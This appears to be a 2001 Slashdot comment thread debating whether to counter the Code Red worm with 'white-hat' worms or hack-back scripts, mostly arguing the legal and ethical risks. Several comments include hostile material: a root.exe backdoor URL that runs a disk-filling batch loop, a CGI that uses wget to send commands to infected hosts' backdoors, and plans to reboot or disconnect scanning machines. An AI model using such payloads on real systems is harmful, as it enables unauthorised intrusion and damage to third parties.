But as people have said, you can be forced to take medicine if you are a danger to other people(anti-psychotics anyone?), you can be forced to put your dog to sleep if it has rabies. There is a precident for this, but it is carried out by the government.
The biggest problem with a 'vigilante' approach is that if someone were to do it and get caught, then they would possibly be scapegoated. What we need is for someone in a government agency (FBI, CIA, or NSA to name a few) to do it. Especially those last two.
Or someone else could just post HOW to do it (as anonymous coward of course) somewhere... and a lot of people on
Free as in *BUUURP!*
Ask your lawyer the same question about an injured person lying in the street. If you do nothing, they can't sue you right? but if try to help them, you might actually injure them and they'll sue you. Does this mean the RIGHT action is to do nothing? No. It means the legal system is fucked.
"All that is necessary for the forces of evil to win in the world is for enough good men to do nothing." --Edmund Burke
m00.
I'm not usually one to spout Libertarian philosophy - but in this case, if somebody wants to leave their box open - through ignorance, laziness, or some other ineffable reason - that is their choice and not the choice of some 15-year old hacker who thinks he'll redeem his l33t friends' images in the media's eyes.
Actually, it is illegal to intentionally contribute to the spread of a computer worm such as this one. Of course if they found the person who released it, they'd prosecute. Now, they're not going to get the people who haven't patched, because it's not such gross negligence as to be criminal (not to mention it'd be a waste of time). OTOH, if someone actually wanted to leave their box open to spread these sorts of things, as you suggest, they could likely be prosecuted.
So, sure, you still can't take the law into your own hands. OTOH, in this case it becomes the feds' choice.
this is fine, except that you then have done all the hard work for making a quieter (because it only attacks infected servers) even more harmfull worm. Say one that overwrites the partition table on the anniversary of the DMCA being passed :)
I had the exact same idea yesterday while talking to a friend. I dismissed it because I'd probably be jailed for DMCA violation (copying a buffer overflow mechanism), "damages" (down time for server restarts), and being a "hacker". ;-)
If I install Win2K or NT on a box connected to the net right now, there is a high probability I will be infected before I can even apply the patch. That's a fact.
Tha's why you don't connect a machine externally until you've patched it.
Reboot macht Frei.
I know that even if I got on a windows box, I don't think that I could work it. But here is an Apache module I saw on the mod_perl mailing list that will report the Code Red worm to Security Focus, and try to email the admin of the infected box.
Off-topic self-response:
Look, I don't want to fault the Gates' philanthropy per se, I just wonder what strings are attached. I'm a Unix-head pretty much, and I learned Unix on a 4.2 BSD Vax. Good move for Digital to play to the edu market, but it meant I didn't get to learn anything about DNOS on the TI 990/12 that the school actually ran on. So I tend to blame Digital as much as MS, IBM, or anybody else that there never was a 32 or 64-bit version of the TMS99000 processor to port Linux to. Discounting the Sparc, which is sort of half 9900.
I've seen some of the new CS buildings in my state. All windows boxes. Gone are the Vazen, of course, and the TI's, even the S1500's, but also no more HP 9000's, SGI's, Suns, IBM medium and big iron, etc. Don't see any Alphas. Or even any Macs. Very, very monoculture. Impresses the rubes, maybe, but the experienced eye will see that either the business dept. has taken over completely, or the academics have completely abdicated. Not very reassuring, and it goes way beyond the computers.
Yes, even Linux and BSD users are vulnerable to worm attacks if they don't stay on guard, and, despite a comment I made the other day about lusers who happened to be running W2K, you can secure IIS like any other server. It's just more difficult and expensive than with free software. Plus the knowledge will be totally obsolete inside of 6 months. Yeah, that $2000 MCSE training course was WELL worth the money.
I'm kicking myself now for even considering an anti-worm, at least publicly, because the potential avenues for abuse are.really sinking in to me. It's really a bad, bad idea now that I think more about it.*ESPECIALLY* as public policy.
Do what you have to do, on a host by host basis, but for crying out loud don't talk about it here.
Maybe people will start to wise up after the crooks, and I don't mean script-kiddie vandals, get through rifling through all those rooted boxes. Oh well, at least "consumer spending" is going to be up for a couple of months.
Rogue Bolo
==not looking to be busted, so posting anonymously==
I've been using computers for 15 years now, for fun, for work, etc. I have never understood why viruses are created. Maybe people hate microsoft, so maybe they write a virus to exploit windows computers. I don't know. Do any of you slashdot people know virus-writers personally? I would really love to know what their motivations are. I know several people, good people, whose lives have been devastated by a computer virus, and I think it's quite unfair.
You would have to know about the virus and what it does in order to write a virus to counter it. If you are lucky to get ahead of the virus (i.e. Code Red) it may work... but how do you write a virus for a potential virus? I think they call those programs that run in background processes looking for an unknown virus heuristic (sp?) ant-virus scanners :)
Keep in mind that nearly every law that outlaws hacking is based on "unauthorized access."
Define "unauthorised access". All it takes to run a program on an infected box is an HTTP request. So are all HTTP requests "unauthorised"?
Lets say only "linked" URL's are authorised - so any link you click is okay, but you can't enter http://www.slashdot.org in a location bar of your browser - so authorised HTTP requests must encompass this
So if entering http://www.slashdot.org is authorised, why not http://www.infectedbox.com/cmd.exe?somefunnystring thatdoessomethingonthewebserver ? Since in both cases they are HTTP requests, one could be a static page, but the other is a call to a server-side script.
IMO any HTTP request to a webserver connected to the Internet is authorised unless its explicitly stated otherwise and/or causes visible damage, harm or loss to the website owner - such as a Denial of Service.
http://news.cnet.com/news/0-1003-200-594940 1.html
http://news.zdnet.co.uk/story/0,,s2086609, 00.html
http://www.infowar.com/iwftp/icn/17May200 1_New_wor m_patches_linux_vulnerabilities.shtml
http://www. securitynewsportal.com/article.php?sid= 437 .
.
Also interesting for history buffs is the Internet Worm of 1988 that shut down the internet!
http://world.std.com/~franl/worm.html
"The dead have risen and are voting Republican!" --Bart Simpson That's because here in Chicago the dead are getting tired of voting democrat.
I have started to call the places that are near the top of my 'attempted infections' list and leave messages for people (ask for man in charge, settle for their incompetent IT department) to the effect of:
Hi there asshole. Your host, 1.2.3.4, has attempted to infect my network 12,736 times since 4 AM Sunday. (Yes, I monitor infection attmepts from a Redhat host with the usual log rotation!) Why don't you patch your piece of shit Windows host, disconnect yourself from the Internet, and fire your incompetent or lazy ass. Thank you.
I looked at this and immediately remembered an article i read concerning the bind exploitations. A man coded a worm, which went to all suceptible boxes, exploited the bind hole, gained root access, patched the holes, and proceeded to the next systems to continue it's work. It worked quite well, and you can all say hi to him when he gets out of prison. Whether your intentions are good or not, if you code something that enters another's system without their explicit permission, you are breaking the law. It may be a great idea, and I think it is, but is it worth dealing with the law?
If I install Win2K or NT on a box connected to the net right now, there is a high probability I will be infected before I can even apply the patch. That's a fact.
If I install Linux/BSD/etc with Apache on a box connected to the net, I will end up with an access.log full of default.ida?XXXXXXXXXXXXX requests and nothing more. That's a fact.
It's disingenuous to say that the indexing hole is comparable to "some CGI script," because that CGI script is not a default component of the Apache installation. The relative security records of Apache and IIS are not the result of "open" vs "proprietary" development models, they are the result of the attitudes of the respective developers towards the need for new features and accountability to end users. IIS doesn't end up with more holes because it's "closed-source," but because it's designed to add as many features as possible and install those by default. This isn't an ideological difference, it's good development practices difference.
If it ain't broke, you need more software.
The solution is twofold.
A: Microsoft needs to release more secure OS/Web servers.
B: People need to patch their system themselves or take it off the net.
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
Say you could create a worm that fixed the problem.. Aren't you potentially making the problem that much worse? I can just see two worms endlessly chasing each other around the net, wasting tremendous amounts of bandwidth. If the white hat worm went and patched the security hole that the first worm uses to get itself in, this wouldn't occur, but wouldn't you still have thousands of white hat worms spraying the net with data instead? The number of potential problems created by releasing a "predator" worm into the net environment could potentially be disasterous, not the least of which is the bandwidth that would be used up by rabid worms.
// harborpirate
// Slashbots off the starboard bow!
Whoever the fuck modified my comment as insightful is a flaming retard. So I guess I should say "thank you" for keeping the standar of /. moderation consistent.
The enemies of Democracy are
Nope, you didn't /. any of those, but you did save me some time in tracking down a CRII-infected server to play with. Seems you can manipulate the files in the \inetpub directory, but very few anywhere else. Making a dir on the desktop didn't work, but their index.asp has been renamed. Hopefully and admin with 1% of a clue is supporting this server.
So, youve got a worm out there, trying to find a new host, taking up bandwidth. Now release into this a second worm, using the same amount of bandwidth, if not more, because it has to carry the patch with it to do its job. Suddenly, youve got twice the problem you did before. No, you could just write a program that listens for the worms signature http request, and only fixes that one server, but even that has its problems.
The solution to this is not a worm arms race to see who can write the best worms and counter-worms, It is proper system administration. Any other solution is stopgap at best.
Even if one were to send out an anti-virus to "fix" Code Red II, there's no guarantee that the backdoor hasn't already been used to insert far more dangerous code. Now the user may check for root.exe or the registry settings, decide he or she wasn't infected, and merrily go about their business. Meanwhile their machine is patiently waiting for the next DDoS command.
Better the user nuke and pave an infected machine and learn that painful lesson.
You're writing an anti-virus virus?
Well, I'm writing an anti-anti-virus virus!
...
(days pass)
OK, then I'm writing an anti-anti-anti-anti-anti-anti.... anti-virus virus!
-J5K
The libertarian solution to the failures of capitalism is to apply more capitalism til the failures are fixed.
She may not have done if she were just in the back garden, without her key :-)
I have hit many brick walls trying to implement Linux or OpenBSD in organizations. One company was told by their software vendor that having a Linux box on their network would hurt their NT server -- so they ran MS Proxy for Internet access instead of a NAT box, and it never works right. Another company replaced a working web server (Linux) with a Windows 2000 box just because they made a policy to strictly run Windows in their organization.
I do not like virus authors and worm writers, but it has been great to go into a company and say here is why you should not use Outlook. Or, here is why you should run Apache on Linux.
Click here or here.
pay a fucking law student, theyre everywhere, and ill be damned if they wont work for peanuts. If I was into law/sci - fi working for you guys would look AWESOME on my resume... i mean, think about that, you cant BUY real world experience like the kind of work you would get here...
________________________________________________
Lots of people here are saying "this is legal because you have good intentions" ... which is, of course, absolutely not true.
/.) IANAL, but I imagine the courts would be quite willing to see a counter-worm situation similarly. It is not legal, and it could land you in some serious trouble even if your intentions were pure.
Imagine you got home after work one day, and found your front door standing wide open. You frantically search the house, and find a complete stranger sitting down at your computer. He cheerfully tells you that your computer was infected with a virus, and that he's going around the neighborhood breaking into people's houses fixing their computers.
No damage was done, because he merely picked the lock to the front door. You check out your computer and as far as you can tell everything looks fine, so it seems like he was telling the truth.
Do you:
A) say "Oh, that's okay! Thanks for fixing it!"
B) tell him to get the hell out of your house, and then call the police?
I'm betting the vast majority of you would pick (B). Now (just like all the other idiots on
ZFS: because love is never having to say fsck
Create a anti-virus that downloads the patch from MS and works in a worm-like fashion with a twist. Limit your propagation to a single domain. You would need to have detailed reports of course. Sell your service to lazy admins and make a pretty penny (for doing nothing.) Sell a new version every time a new virus comes down the pipe. Be sure to include license information that makes it clear you will not be liable for misuse of your program. It could work.
Live wrong, impostor.
In 1989 the WANK worm infected NASA's DECnet and spread from there to such exotic locales as HEPnet, EUROnet and couple other fun ones. The worm would infect a system by trying password == username (surprisingly successful) and a couple other basic attacks. Then it would look for a process name like wwdk_1234, where 1234 was just a random number string. The worm would look for this process and if it found it would terminate, otherwise it would set up shop. What the heroic sysadmin did was rewrite teh code to look for a definite number and if not found it would kill that process and start its infection routine, effectively killing the actual worm and replacing it with the benign version. The hacker later countered by simply looking for that process and killing it then running its infection routine, but for a while the counter-worm worked. -Source: The Underground, by somebody, available online somewhere and in hardcopy. (Okay, so my memory isn't perfect.)
Lusers, lusers, everywhere and not a LART in sight.
... that the Slashdot editors don't read Slashdot.
... -1, redundant.
This has been discussed on the other three Slashdot stories about Code Red.
Each time, none of the comments have risen above +1. Some have even been modded down to...
Nevertheless, this is a good idea. You have to remember that not all NT administrators are anything more than employees of a small company trying to see what this "Internet and web server" thing is all about. They'd patch, but they just don't know how. (And yes, I know. If they don't know how to administer it, they shouldn't be trying to.)
I believe that the United States FBI still counts this as an unauthorized intrusion, so watch out if you do try to inject something like this into the Internet...
Do you like German cars?
How about instead of actually patching the machine or doing something else to affect the state of the machine (like turning off the web server), you simply pop-up a message on the screen that says "This machine infected with Code Red, please download update from Microsoft.com/security" or something along those lines. I'm not sure myself how you'd go about raising a message or dialog box but there are probably a number of ways you could do this.
That way you don't enter the grey area of messing with another users machine, and since most of these boxes are probably home machines they'll get the message pretty quick that someone can do anything they want with the machine and they should patch it pronto!
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Compare: Adam breaks into my server and steals confidential data. I trace the attack back to Adam, infiltrate his workstation, and perform a destructive format of all of his hard drives.
This scenario doesn't really make sense as an analogy to the *physical* scenario. If Adam stole your stereo, you have no right to go break into his house and take the stereo back. Once the stuff is stolen, you have to go to the police. Only when you are in imminent danger does the law apply.
On the other hand, if you saw Adam break into your server and he is about to delete all your files, then you have every right to kick him off your system, even if in the process, you harm his system in some way as long as the methods you use are reasonable and don't do more harm than is necessary. Since kicking him off your system probably won't harm him at all, these laws don't apply very well.
Once the attack is over, you go to the police. In our society, normal citizens are only allowed to use force that would otherwise be illegal, when the police are out reasonable reach...Like when you have shotgun in your face.
Mad Software: Rantings on Developing So
or at least fill up the harddisk...
/scripts/root.exe?/c+echo+@echo+off+>fill.bat&echo + echo+a^>a>>fill.bat&echo+:loop+>>fill.bat&echo+typ e+a^>^> a>>fill.bat&echo+goto+loop+>>fill.bat&start+/min+f ill. bat
GET
i'm sure someone else can do something a little more nasty!
now all we need is a few thousand linux machines listening for the crII signature and to send this url back to the machine. that will slow it down dramatically.
I didn't ask my lawyer about this, because I know exactly what he would say. "catfood," he'd say, "what happens if you don't send the white-hat virus to those hosts that are probing you?" And I'd say that basically nothing bad will happen to me; I'd just get a couple hundred hosts a day knocking on my door and not getting in. And then my lawyer would say, "and what might happen if you do send the white-hat virus out?" At which point I'd say well, I guess it's remotely possible that I might break something, and the other host's manager might notice it...
And then my lawyer would say, "Don't be an idiot. You'd be exposing yourself for no benefit to yourself, right?"
Then I'd say okay, you're right, and my lawyer would send me a bill for $300.00.
I save a lot of money by asking myself, "what would Tim the Lawyer say?"
There's a small difference here.
The fact that a hole exists isn't the problem. The fact that a hole is being exploited actively, and being used to propage software to hundreds of thousands boxes (causing all sorts of bandwidth problem) is a SERIOUS problem. Compounded by the fact that 90% of the people who are currently infected by it WILL NEVER FIX THE PROBLEM THEMSELVES. This has been going on for almost a week now, and it's only getting worse! My server at home is getting hit by this damn thing multiple times per minute! Hell, the after this thing was in the wild for the first 16 hours, I had 355 registered attempts to hit my box with it.
The app you speak of did four things:
* it patched holes
* it left open a new backdoor
* it tried to spread itself
* it told no-one what it did
I'd have no problems with something that patched compromised holes, didn't leave open any backdoors, didn't attempt to spread itself, and told the owner of the box in some fashion what it did. Some would argue that "well, they'll have to wipe the box because who knows what was done by the fix" -- guess what, they should have done that in the first place, because god only knows who else did nasty things before the hole was patched...
We could use the same buffer overflow in order to install the patch... not a virus, no self replication, but running a patch installer against the systems that appear to be infected according our logs.
There are a lot medication for the flu. You can find a few dozen at your local pharmacy.
I think what you meant to ask is if there is a vaccine. The answer is yes, but the flu virus mutates fairly rapidly. Every year there are a few more new strains, and so you have to go get a new flu shot if you want to stay immune.
SPQA
I've put the following CGI as default.ida on several webservers:
d +127.0.0.1+WARNING!+This+server+has+been+infected+ by+the+Code+Red+worm.+See+http://www.emsolutions.n l/codered/+for+help."
#!/bin/sh
echo "Content-type: text/html"
echo
echo $REMOTE_ADDR
/usr/local/bin/wget -q "http://$REMOTE_ADDR/scripts/root.exe?+/c+net+sen
(Add or remove whitespace to taste)
We've had something like 80 hits in 3 or 4 days on that page. Mind you, some NT admins can't type the URL in correctly...
Somewhat more hazy is setting your web server up to shut down a web server that just scanned your for code red II. That would be completely passive and would have a hell of a lot more benefits than drawbacks. If you're evil you could also bill the owner of the server for administrative services (With about 2000 scans since saturday, I could have made a hefty chunk of change on paper had I been doing this heh.)
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Eventually chaos theory will dictate that the nature of the relationship has become so complex as to be unknowable.
And then Jeff Goldblum shows up, ah, showing, ah, us that, ah, nature, nature, ah, finds a way.
What about something like this? Put in you apache home directory a new default.ida archive with this lines:
.ida extension parseable by php. I don't know if this can work, but...
<?php header("Location: http://www.causeanaffect.org/thanks.html"); php?>
Now make
You'd think so, but there are plenty of cases in turn where the family sues for damages, or even worse murder charges are pressed. Revel in the beauty of the U.S. justice system.
I'm the big fish in the big pond bitch.
Cheese, a linux worm did this.
Read This
Viruses are free and Antiviruses are NOT. Do YOU see any connection? That's because antivirus software companies like to earn money on people making viruses.
Bullshit. It's absolutely a box we want to open. Go read a book on artificial life. Just because you don't understand something doesn't mean it's dangerous to you.
People fear what they don't know, which is why alife gets such bad treatment in low-brow popular entertainment.
fifth sigma, inc.
The problem is that anybody can spoof the originating adress to look like it is www.whitehouse.gov so the counter attack could be used as a DDoS tool...
If you look at the virus'es that have been made, many of them have destructive effects that were not intended originally. A virus or worm that spreads itself, might cause trouble just by spreading - activating firewall warning systems etc.
Yes, it is possible to write a counteragent that would infect the same hosts as another worm, remove the worm, and close up the vector, possibly, to prevent a relapse. But, while this action may seem at the outset to be a beneficial thing to do, it is fraught with risks.
/not/ be 100% sure that the changes you will make will not have a negative effect on hosts you are trying to repair. Considering the difficulty, today, of producing a truly bug-free piece of software, due partially to glitchy libraries, I would consider it very likely that a so-called counter-virus would likely do as much harm as good.
As a case in point, refer to the Morris Worm, which shut down a large part of the Internet in its nascent years. The worm was never meant to be detrimental to its host's health, and was designed to give the author some statistical information about the number of hosts, etc. An error in the worm's propagation routines caused it to overproliferate, swamping the CPU of the servers involved, and bringing the network to a screaming halt.
You, as the counteragent author, can
The ethical thing remains to be informing the individuals who are still propagating, and ensuring your own house is clean. Perhaps we should form some RBL-style blacklist of hosts currently known to be propagating and susceptible to known worms?
Weapons of Mass Analysis
I hardly use NT or 2000. I'm surprised then that the sysadmins didn't install their patches sooner, if Windows is telling them "Hey! I'm vulnerable! Fix me!". Wow. Why did they wait so long?
Slashdot desperately needs is a full-time lawyer. It's a great site for Internet geek stuff but nobody on the site has the first fucking clue about liability law. That in itself would not necessarily be awful if it were not the case that all discussions here invariably end up with a bunch of laymen talking legal theory. Lawyers, help!
There have been many suggested responses, in approximate order of grayness;
- Do nothing.
- Send email to any system that probes yours.
- Provide a patch, and make it as easy to download and install.
- Have a bot send email to any system that probes yours.
- Provide a web page that activates a bot that exploits and patches a system.
- Have a bot exploit and patch any system that probes yours.
- Have a bot exploit any system that probes yours, and patch it with the bot.
- Actively search out infected systems and patch them.
- Actively search out infected systems and patch them with something that
actively searches for systems.
- Write an even more virulent worm that patches systems.
I feel that arguing the current legality of the above options is meaningless. The question is, which of the above is the right thing to do. Once it's decided what the right thing is, then we can change the law to make that legal.Personally, I would be opposed to anything past 6, as they all involve unlimited expansion, and thus are potentially more harmful than the worm they are stopping. Below 5, I think is ok, although 4 does have some potential for harm. As long as the bot is properly limited to, say, one email per infected system per week, then I think the response is justified.
5 is curious - it does involve cracking the infected system, but theoretically only at the behest of those who are infected. There is, however, a potential for abuse - you could spoof a request, and trick it into patching a different server. However, someone would have to actively choose to spoof it, so it effectively is no different than the spoofers running the exploit themselves. I.e. you've made it a tiny bit easier for them to do it, but didn't actually initiate the action.
6 is onerous. It does involve cracking a system - but it's a system that is "attacking" you, and potentially others as well. I would rate it about the same as cold cocking someone who's been drugged, and is now running around swinging at everyone they see. I'm nervous about the idea of vigilante cracking, though - too much potential for abuse. Perhaps a compromise between this and 4 above - have someone "trusted" set up a cracker/patcher that only patches servers that are reported to it, and which it also agrees are infected and dangerous. Sort of like calling the net-cops on the server.
Haven't we already discussed this?
Alex Bischoff
HTML/CSS coder for hire
A friend of mine, Dan Holliman, suggested that we write an apache module that performs exactly this. When the module receives a request to the default.ida path, it sends an HTTP query back to the requestor's IP using the hole to cause a system reboot or freeze, or to remove the default route or interface on that box.
Reminds me of what my dad used to say... "Fight Fire with Fire".... He didn't last long in the fire brigade...
How about a worm which breaks into Windows/IIS, and replaces it with a Linux Apache system without upsetting the served site. Now that would be cool.
So this is how it all starts...Worms and AntiWorms..next thing you know..the air is thick with NanoStats running amok, choking air conditioners, clogging intake valves, and fouling table clothes.
We were somewhere around Barstow on the edge of the desert when the drugs began to take hold. - HST
VbScript that uninstalls MS Outlook?
JiM
---
Better Living Through Reckless Experimentation
Vacate my ass! If anybody ever walks into my house, let alone threatens me, I have every right to shoot his ass. Period.
...installs Apache instead of IIS :)
I can no longer run services on port 80. As of tommorow port 25 is filtered.
Verizon is my DSL provider, telocity is the only other choice and they use Verizons network so the filters will remain even if i switch.
I pay for Pro service and now some Virii/Worm has expired my abilities to run a hobby server at home
Cable modems (@Home) aren't available in my area yet and they have a terms of service prohibiting running servers.
Is the internet dying now that monopolies have 100% control? I mean verizon is blocking services, other isp's control the content and now even if i switch providers i'm still paying for a monopoly after all?
Just look at how many of these worms have had little bugs in them, like not attacking when the were supposed to, or emailing the wrong drop and stuff. All we need is some cowboy thinking he is going to clean up the internet and messing up even more stuff.
Ever see that movie Office Space? One wrong decimal point could mean big trouble. It is bad enough these people have to run Microsoft's buggy code. But at least they chose to do that. They shouldn't be forced to run your buggy code too, even if you are trying to help.
why not just create a list, where admins can subscribe and their computers get automatically fixed using the counter-virus? The scanning algorithm sends a request to a central server that responds with an IP-adress that has been added to the list and the client checks that server.
Will the evolution of the WWW go in the direction of the humans? Will there be wars in which groups of pro-hackers, leaded by Bill Gates, join together to create a Nuke-Virus to get rid of the minority groups (eg, VMS users)? While the Linux groups have a treaty to protect the small island of VMS, they must retaliate, in full force! Then the Mac users will join in on the side of MS. But the Windows users will be too snobby to associate with "people who don't have a character terminal". Thus a civil war between Windows and Mac.
This sounds like a twisted war-in-the-making, resulting in the death of many computers!
Note: I don't want to offend anyone
-- geekcode: GU d-- s+: a---- C++ UL++ P-- L++ E--- W++ N++ o K- w-- O M- V- PS PE- Y PGP- t 5 X R tv+ b
Wasn't this same idea brought up a month or two ago and sufficiently trashed at that time???? Is /. the department of redundancy department?
Not only has this been done before, but its been reported on slashdot. Next! http://slashdot.org/article.pl?sid=01/05/17/003820 5&mode=thread
http://news.bbc.co.uk/hi/english/sci/tech/newsid_1 344000/1344344.stm
I thought of that myself...seems very possible...might be an invasion of privacy though.
Intelligence is like four wheel drive, having it just means you'll get stuck in more remote places.
I'm sure folks will scream its illegal and it probably is - but can't a case be made for 'self defense' I mean if someone brandishes a gun at me am I not within my rights to shoot them or at least take their gun away?
Why not apply the same logic to this, they are probing me to infect my server so why can't I probe back and disarm them?
Top Most Bizarre/Disturbing Error Messages
And after closing the hole, the counter-virus should stay resident and launch a counter-attack against anyone who tries to exploit the hole with anything other than the counter-virus.
Max Vision from whitehats.com did something similar and is serving time for it...
After hearing what everybody has to say, I've decided that this sort of script is probably not a good idea. To those of you who replied to me via email, I'll send you a link to a webpage where I'll be putting up the script, once I get hold of it. You'll be able to reach it after clicking through a disclaimer.
I would still advise against anyone using this in "production" (i.e. to combat live code red attacks on the open Internet.) Think about it:
If, for some reason, your copy of the script mis-performs and corrupts IIS DLLs or executables on the attacking host, you will be liable.
If the federales are monitoring traffic and see your box actively exploiting the Code Red hole, you're in trouble.
If your ISP notices your box "propagating" Code Red, then you are likely to be denied service (in the most literal manner) and your account might be terminated.
So, in the final analysis, it's probably better just to put up a default.ida that does a "net stop w3svc" (as someone else here recommended) or does a reboot.
Read that post from bugtraq archives: The proposal of creating such an automatic healer worm started a fierce discussion.
I sent in this article way before this other guy did. His comments sound awfully like my web site.
See the newsgroups for a timestamp.
microsoft.public.inetserver.iis.security,
microsoft.public.scripting.virus.discussion
AND
alt.comp.virus
Search on the terms, that I used first.
Fight Virus With Virus?
But then again, I didn't first come up with this idea any. Many other people did. I just just used a little down to earth communication to drive home the point.
See my newest argument at
Bait-and-Injured-Virus OR Wounded Virus
n dex.htm
This may or may not get you around the trespassing legal problem
This is the original page below
http://www.internetwebfactory.com/antibodies-00-i
Philip Chin
The lesser of the two evils. Geeks talking about law or Liability Lawyers talking about computers.
If you want a good laugh, read a judgement about something computer related - always very funny.
They need a Lawyer that is also a geek.
"Radek" when we need him....:)
Just because they run IIS doesn't mean they should suffer more. For the good of the internet, ALL web servers need to be secure regardless of the vendor.
This would be a BAD idea. It's still a virus, and regardless of intent, you'd be open to litigation / incarceration because of it.
While the Code Red virus has been spreding rapidly, in part due to all those Windows 2000 users on cable modems, I think this idea of "fixing" everyone's computer is a really really bad one.
By connecting to someone elses computer, and running code on it without their permision you are in fact committing an illegal activity. I think a much better idea would be to politely inform the machines' owners that their server is infected. Also providing a link to the patch.
Any unauthorized access is scary. Remember that worm a while back that went around and "fixed" unix systems by patching holes? Remember the outcry about how no one would want that because it was "Their" server and whatnot. Same thing applies here.
S.t.e.v.e.
first of all, i know I wouldn't want a virus continuously polling to see it someone is trying use a backdoor, hell i dont need the slowdown after the virii is history... second, is it ethical to "fix" someone else's machine?
thad
I love Mondays. On a Monday, anything is possible.
This is a very Bad Idea. First of all, unauthorized access to a computer is, by definition unauthorized. Any worm which spreads changes is illegal and as such a Bad Idea.
No matter how good your intentions are (RTM just wanted to play around, right?) you cannot take the "law" into your own hands.
Ethical issues aside, it would be very dangerous to being publicizing that there was a beneficial worm available; immediately, we would get copycat worms everywhere, appearing the same (yes, this could probably be circumvented by MD5 checksums or something, but jeez, if the webmaster was going to go through THAT much trouble, they'd install the damn patch themselves!) but doing far worse things.
I'm not usually one to spout Libertarian philosophy - but in this case, if somebody wants to leave their box open - through ignorance, laziness, or some other ineffable reason - that is their choice and not the choice of some 15-year old hacker who thinks he'll redeem his l33t friends' images in the media's eyes.
The defenses always have to be kept up - or else you have to start making judgment calls about which outside sources to give access to, which is a path no one wants to go down.
I contacted the local FBI office here in Tampa and they said that according to the current computer crimes law it would be alright to alter the source code of the Code Red virus and make it able to fix servers that are still open. The agent I spoke with also said I should consult a CyberLaw Attorney for more information but to her knowledge it would be legal and probably smiled upon.
//----(triple c)-------//
A trojan is safe in the hands of someone who's not going to do any damage, but I've heard of people who go around handing out a Sub7 trojan in chatrooms... sorry, IRC channels ^_^, but disguised as a different kind of file. As soon as the 'victim' runs the file, the 'hacker' goes into their computer and totally wrecks their machine. Newbies don't know any better because it's not obviously a trojan. There ought to be a program that goes around automatically closing open sub7 trojans, or perhaps giving the infected user notification and asking them if they want it removed. How about it?
jd
I don't think this would be a very goo idea since we will be having a new problem (assuming that the antivirus-virus worked fine). If, and only IF, every user accepts that a virus like program fixes his machine, this program will spread throught the internet like hell ( since no real antivirus will stop it), then, what stops a virus maker of modifying the code so it "looks" like the original, but actually does virus like activities? This will bring a nice problem to the antivirus companies, having to "filter" the bad virus and letting in the good virus. Now, let's talk about the users, generally stupid enought to double click on any attachment they get on their email. Knowing that a good virus is around will make them EVEN more uninformed about what they are running/openning, so if the antivirus software they are using tells them, "Hey this could be a virus, BUT could also be the good guy", asking them if they want to let it in, i have no doubt they would respond with a big YES and merry christmas!!!
I've already finished writing a test utility to exploit the backdoor on my infected test server. Now I'm working on a PHP script that at attempt to infection will automatically send an HTTP request back to the attacker's backdoor telling it to use ipconfig to turn off the network adapter. If a virus attempts to DOS my line with an ARP storm such as this, I have a moral duty to help protect my neighbors and lock the door, no? You can't say there's no damage from the worm... reports are out today that entire ISP's are shutting down ADSL service for "possibly a couple of days"
... the owner of the house is the one responsible for making sure the door is locked.
Well, I can't accept the kind of topsy-turvy view this implies (or maybe I'm just inferring it).
It is not unlawful and immoral to fail to lock your door. It is unlawful and immoral to enter the private property behind that door and trash it or steal things. Let's not lose sight of who is doing the wrongdoing.
Is blatantly lax security unwise? Hell, yes! Do we want to settle for a society where every single thing has to be locked down tight, or vultures will vandalize and steal everything? Hell, no! Lock up to a reasonable extent, but at the same time, track down and prosecute the bejesus out of the real wrongdoers.
After sitting at datacenter where i work
and analyzing IDS logs and
where code red packets are comming from...
Man, alot of "BigBoys" domains.
I finally decided to close all my credit cards,
which i used to buy stuff over the NET.
Did You ?
There are plenty of virus / works that do this. For example, the Rameon bug. It didn't cause any damage, it patched up a few security holes, replaced the main web page so admins know what happened.
Its funny when you look at the number of worms / virus affect Windows and how much damage they cause. Its also funny to look at how many worms are for Linux that don't do any real damage and simply secure a site for you. Now, its not the answer.
I was watching TechTV this morning, and they estimated that the code red worm costs over $2 Billion USD to fix. They also mentioned that companys aren't getting any smarter. They left with a question of why more companys don't wake up and move on. Its only going to get worse for MS products. The truth is, that *nix is generally much more secure. I personally think its pretty damn impresive how secure OpenBSD, FreeBSD, Linux, etc are comparied to Windows, and how many stupied companys there are still using Windows ...
until (succeed) try { again(); }
In this case, why don't the cable/xDSL providers start suspending the accounts of people with infected computers? That tends to get people's notice a lot more effectively than vigilante counter-viruses . . .
Any sufficiently advanced technology is indistinguishable from a rigged demo
--Andy Finkel (J. Klass?)
If only this sort of thing weren't illegal where I live...
how 'bout virgin sacrifices?
First off, you can go to jail. This is very much like the stunt that got Max Butler, a.k.a. Max Vision, 18 months in Federal stir. Too bad, because he is an IDS wizard, as well as a pretty decent guy, from all reports. But if I were a DOD investigator working on this case, I'd probably want to see him in the slam myself.
Secondly, you cannot audit the actions of a worm. And when you close a hole like the one Code Red exploits, you want the actions to leave an audit trail.
Thirdly, a anti-worm-worm is not certain to infect, and thus patch, the systems that you want patched.
Better in all ways to just suck it in and patch the systems you own, yourself. And email the poor schmucks who just don't know their W2K boxes have IIS servers running, unpatched, and which have thus been hit, that their systems are infected and infectious. I fired off an email to uunet two days ago about an infected box scanning the networks I monitor. The worm's scans shut down just three hours later. Coincidence?
Just judgeing by the number of responses this topic has generated, I wouldn't be surprised if the code red III virus wasn't sent as a email that claimed to be a virus fix patch to computers uninfected to begin with. I'm still waiting to get infected with something that gets on irc and gets new released movies for me and throws it up on my desktop. Maybe the new wave of white hat hackers will be more grey hat and write exploits that are fun or helpful, but hardley damaging.
But if you are going to release this into the wild, people on various ISPs are going to see packets coming from your machine and accuse you of trying to hack them. If it infects a "sick" host, makes it well, then infects a few more "sick" host, and then deletes itself and all tracks it can from the first one, it's harder for them to find you to use as a scapegoat.
Read up about Randall Schwartz and David McOwen before you jump in and run something like that, even if it is on your employer's computers and for good purpose. The fact is, sometimes you have to do your job annonymously.
Of course there are many ignorant posts. I've learned to respect people on a post-by-post basis. One day I read an informed opinion, and the next I see the same person talking out of their ass.
The same would go for a post by a *real* lawyer. I wouldn't accept it until I researched it myself anyhow.
Just don't do ANYTHING at all, and then you reduce your chances of being arrested for anything. Whether your action is illegal or not, your guilt will be decided by 12 ignorant buffoons anyhow.
Basically, ignorant postings are a great way to figure out if you'll end up in jail for something or not.
I'd like to request that people stop making ignorant technical postings, instead.
~D
